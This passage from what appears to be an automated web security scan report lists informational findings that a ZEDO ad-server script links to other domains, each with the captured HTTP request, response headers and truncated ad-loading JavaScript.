document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.32;sz=160x600;click=http://yads.zedo.com/ads2/c?a=929080%3Bn=809%3Bx=1813%3Bc=809001050,809001050%3Bg=172%3Bi=14%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=14%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.166. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.3155849029267127 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFgeo=2241452; FFad=36:35:34:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:2,1,1:0,1,1:2,1,1:1,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=35:36:35:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=59
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:49:22 GMT
Connection: close
Content-Length: 2714

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/UNY/iview/312587473/direct/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=934861%3Bn=809%3Bx=1792%3Bc=809001050,809001050%3Bg=172%3Bi=35%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=35%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="160" height="600">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

23.167. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.2760806087203951 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFgeo=2241452; FFad=27:25:27:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:0,1,1:1,1,1:2,1,1:0,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:2,1,1:0,1,1:0,1,1;expires=Tue, 24 May 2011 16:48:47 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,3:809,1050,7:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=26:27:27:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=94
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:48:47 GMT
Connection: close
Content-Length: 2114

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3271.dogtimemedia.com/B5314413.10;sz=300x250;pc=[TPAS_ID];click=http://yads.zedo.com/ads2/c?a=921885%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=26%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=26%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.168. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.5533329287390039 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFgeo=2241452; FFad=3:3:4:None; FFCap=1574B809,210132,210841,210128,204732|2,1,1:1,1,1:0,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732|2,1,1:1,1,1:1,1,1:0,1,1;expires=Tue, 24 May 2011 16:47:07 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=5:3:3:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=194
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:47:07 GMT
Connection: close
Content-Length: 2688

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/UNY/iview/312587463/direct/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=931206%3Bn=809%3Bx=1792%3Bc=809001050,809001050%3Bg=172%3Bi=5%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=5%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="160" height="600">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

23.169. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.799291021295764 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFgeo=2241452; FFad=34:34:33:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:2,1,1:0,1,1:2,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:2,1,1:0,1,1:2,1,1:1,1,1;expires=Tue, 24 May 2011 16:49:17 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=34:34:34:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=64
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:49:17 GMT
Connection: close
Content-Length: 2643

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<IFRAME SRC="http://ad.doubleclick.net/adi/N5767.dogtimemedia.comOX6462/B5286815.2;sz=160x600;pc=[TPAS_ID];;click=http://yads.zedo.com/ads2/c?a=907527%3Bn=809%3Bx=1813%3Bc=809001050,809001050%3Bg=172%3Bi=34%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=34%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>');
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5767.dogtimemedia.comOX6462/B5286815.2;abr=!ie;sz=160x600;pc=[TPAS_ID];;click=http://yads.zedo.com/ads2/c?a=907527%3Bn=809%3Bx=1813%3Bc=809001050,809001050%3Bg=172%3Bi=34%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=34%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.170. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.9251405538277346 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFgeo=2241452; FFad=62:52:51:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=53:62:51:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,3:809,1050,7:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=62
Expires: Sun, 24 Apr 2011 16:51:54 GMT
Date: Sun, 24 Apr 2011 16:50:52 GMT
Connection: close
Content-Length: 2097

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=934268%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=53%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=53%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.171. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.35797286541562734 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=13:11:10:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFgeo=2241452;expires=Mon, 23 Apr 2012 16:47:56 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=11:13:11:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:0,1,1;expires=Tue, 24 May 2011 16:47:56 GMT;path=/;domain=.zedo.com;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=145
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:47:56 GMT
Connection: close
Content-Length: 2147

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4610.Dogtime/B5083466.8;sz=300x250;pc=[TPAS_ID];click=http://yads.zedo.com/ads2/c?a=903895%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=11%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=11%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bo%3D20%3By%3D64%3Bv%3D1%3Bt%3Dr%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.172. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.9712796154129926 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFgeo=2241452; FFad=13:14:14:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:1,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:1,1,1:0,1,1;expires=Tue, 24 May 2011 16:48:03 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=15:13:14:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=138
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:48:03 GMT
Connection: close
Content-Length: 2643

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<IFRAME SRC="http://ad.doubleclick.net/adi/N5767.dogtimemedia.comOX6462/B5108358.3;sz=160x600;pc=[TPAS_ID];;click=http://yads.zedo.com/ads2/c?a=909002%3Bn=809%3Bx=1813%3Bc=809001050,809001050%3Bg=172%3Bi=15%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=15%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>');
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5767.dogtimemedia.comOX6462/B5108358.3;abr=!ie;sz=160x600;pc=[TPAS_ID];;click=http://yads.zedo.com/ads2/c?a=909002%3Bn=809%3Bx=1813%3Bc=809001050,809001050%3Bg=172%3Bi=15%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=15%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.173. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.3112159612461934 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=29:29:27:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:2,1,1:0,1,1:1,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=28:29:29:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=89
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:48:52 GMT
Connection: close
Content-Length: 2097

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=934268%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=28%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=28%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.174. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.7879302010457392 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFgeo=2241452; FFad=19:19:20:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:1,1,1:0,1,1:2,1,1:0,1,1:1,1,1:1,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:1,1,1:0,1,1:2,1,1:0,1,1:1,1,1:1,1,1:0,1,1;expires=Tue, 24 May 2011 16:48:24 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=21:19:19:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=117
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:48:24 GMT
Connection: close
Content-Length: 2154

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
